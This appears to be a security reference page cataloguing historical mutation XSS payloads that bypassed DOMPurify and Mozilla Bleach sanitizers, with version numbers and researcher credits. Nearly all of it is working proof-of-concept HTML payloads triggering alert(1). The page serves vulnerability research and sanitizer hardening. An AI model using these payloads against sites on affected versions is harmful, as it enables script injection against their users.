XSS

mXSS

Source of table

/ Payload examples

This page contains some examples of payloads used to bypass sanitizers in the past. There are many other examples but to avoid redundancy we will add only ones that include new vectors or techniques.

DomPurify

Version
Payload
Credit
Additional links

2.0.0

<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">

Michał Bentkowski @SecurityMB

2.0.17

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

Michał Bentkowski @SecurityMB

2.0.17

<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">

Gareth Heyes @garethheyes

2.0.17

<math><mtext><table><mglyph><style><math><table id=”</table>”><img src onerror=alert(1)”>

@sqrtrev @0xParrot @web_payload team @GuesserSuper

2.2.0

<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">

Daniel Santos @bananabr

2.2.3

<svg><xss><desc><noscript>&lt;/noscript>&lt;/desc>&lt;p>&lt;/p>&lt;style>&lt;a title="&lt;/style>&lt;img src onerror=alert(1)>">

Michał Bentkowski @SecurityMB

3.0.8

<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">

Kévin - Mizu @kevin_mizu

3.1.0

n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`;

N/A

3.1.7

<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">.

Masato Kinugawa @kinugawamasato

Mozilla Bleach

Version
Payload
Credit
Additional links

3.1.0

<noscript><style></noscript><img src=x onerror=alert(1)>

Yaniv Nizry @YNizry

3.1.1

<svg><style><img src=x onerror=alert(1)>

Yaniv Nizry @YNizry

3.2.3

<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>

Yaniv Nizry @YNizry

Google closure-library

Version
Payload
Credit
Additional links

Last updated